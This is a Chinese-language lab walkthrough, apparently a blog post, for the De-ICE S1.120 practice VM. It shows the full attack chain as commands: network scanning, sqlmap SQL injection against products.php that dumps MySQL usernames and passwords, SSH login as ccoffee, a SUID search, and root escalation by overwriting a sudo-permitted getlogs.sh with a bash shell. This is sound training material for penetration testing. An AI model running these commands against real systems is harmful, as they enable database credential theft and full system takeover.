De-ICE:S1.120靶机

查看MAC地址

将kali和靶机都设为仅主机模式

改为1网段

扫描IP

查看开启端口,可以看到端口 80、443、3306、21、22 已打开

访问192.168.1.120

点击Add Product

提交后,将显示以下页面。

有id值,看看有没有SQL注入

使用工具

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --batch

存在SQL注入

python3 sqlmap.py -u http://192.168.1.120/products.php?id=1 --dbs --batch

python3 sqlmap.py -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch

通过SSH测试它们,所有用户都可以登录系统

使用用户名作为 ccoffee 进行了 SSH

枚举具有 SUID 权限的所有二进制文件。

find / -perm -u=s -type f 2>/dev/null

从截图中可以看出,在列出的所有用户中,用户 ccoffee 为位于路径 /home/ccoffee/scripts/getlogs.sh 命令启用了 SUID 位,这意味着我们可以执行 getlogs.sh 命令内的任何命令

此时,我们还检查一下 sudo 文件的内容

在执行 sudo –l 时,我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码

切换到/home/ccoffee/scripts/目录下

cd /home/ccoffee/scripts/

getlogs.sh 移动到 getlogs.sh.bak,然后使用以下代码创建一个新的 getlogs.sh 文件以生成 shell

使用命令
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" >  getlogs.sh
chmod 777 getlogs.sh

使用 sudo执行getlogs.sh文件

sudo /home/ccoffee/scripts/getlogs.sh

执行whoamiid命令发现提权成功

  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值